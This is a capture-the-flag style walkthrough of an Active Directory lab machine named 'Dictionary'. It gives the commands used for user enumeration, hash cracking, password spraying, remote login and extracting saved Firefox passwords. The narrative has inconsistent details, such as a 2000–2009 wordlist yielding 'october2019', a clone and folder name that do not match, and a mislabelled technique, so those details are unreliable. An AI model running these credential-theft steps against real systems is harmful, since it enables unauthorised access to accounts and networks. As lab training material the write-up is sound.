Premise

In this video walkthrough, we went over a Windows Active Directory lab where we demonstrated the enumeration and privilege escalation through a complete method of password enumeration and extraction. We performed privilege escalation by decrypting a Firefox profile to extract passwords.

Machine Name: Dictionary

Difficulty: Medium

Skills Learned

  • Kerbruting
  • Kerberoasting
  • Password Spraying
  • Firefox passwords retrieval

Finding the First Foothold

My first step was to find a valid user on the system. I started by using tools like nmap and kerbrute to see what user accounts I could find. Initially, I only found one user: “isabel“.

With a username in hand, I tried a technique called Kerberoasting. I used a script called getnpusers.py to request a special kind of Kerberos ticket for “isabel”. I was in luck! I got a hash that I could try to crack offline.

I then used the password cracking tool john with a common wordlist to crack the hash. It didn’t take long to find the password: “june2013“.

HHowever, when I tried to log in as “isabel” with this password, it didn’t work. This meant I had to dig a little deeper.

Expanding My Attack Surface

I went back to enumerating users, but this time I used a tool called rpcclient. This gave me a lot more information, and I was able to find several other users, including “backupisabel“.

Now, here’s where I had a bit of an “aha!” moment. The machine was named “Dictionary,” and the password I found was “june2013”. I had a hunch that other passwords might follow the same “monthyear” pattern.

To test this theory, I created a custom wordlist of passwords that followed this pattern, from January 2000 all the way to December 2009. Then, I used a tool called crackmapexec to try all of these passwords against the list of users I had found.

It worked! I found that the user “backupisabel” had the password “october2019“. With these new credentials, I was able to log in to the machine.

From User to Administrator

Now that I was in, I needed to find a way to become the administrator. I ran a script called winpeas.exe, which scans the system for potential ways to escalate privileges.

winpeas pointed me to a very interesting find: a Firefox password database. I navigated to the Firefox profile directory on the remote machine and downloaded the necessary files: key4.db, logins.json, search.json.mozlz4, and cookies.sqlite.

Back on my own machine, I used a Python tool called firefox_decrypt to extract the passwords from these files. This gave me a list of saved passwords, and one of them looked like it might be for the administrator account.

I used crackmapexec again to test these new passwords against the “administrator” account, and I found the correct one. With the administrator’s password in hand, I was able to log in and complete the challenge.

Technical Commands Used

Here’s a list of the commands I used to compromise this machine:

  • User Enumeration:
    • sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=dictionary.htb,userdb=/usr/share/wordlists/seclists/Usernames/names.txt 172.31.3.4
    • ./kerbrute userenum --dc 172.31.3.4 /usr/share/wordlists/seclists/Usernames/names.txt
    • sudo nmap -sV --script ldap-search 172.31.3.4
    • sudo rpcclient 172.31.3.4 -U isabel%getmein
    • querydominfo
  • Password Cracking and Authentication:
    • getnpusers.py -usersfile users.txt dictionary.htb
    • john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
    • crackmapexec smb 172.31.3.4 -u users.txt -p pass.txt
  • Privilege Escalation and Data Exfiltration:
    • sudo evil-winrm -i 172.31.3.4 -u backupisabel -p 'October2019'
    • sudo evil-winrm -i 172.31.3.4 -u administrator -p 'P@$$w0rd'
    • whoami /priv
    • whoami /all
    • cd Documents
    • cd AppData
    • cd Roaming
    • cd Mozilla
    • cd Firefox
    • cd Profiles
    • dir
    • download key4.db
    • download logins.json
    • download cert9.db
    • download cookies.sqlite
    • sudo mv key4.db cert9.db cookies.sqlite logins.json firefox_ps
    • cd firefox_ps
    • git clone https://github.com/lclevy/firefoxy.git
    • cd firefox-decrypt
    • sudo python3 firefox_decrypt.py -p /home/kali/firefox_ps

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles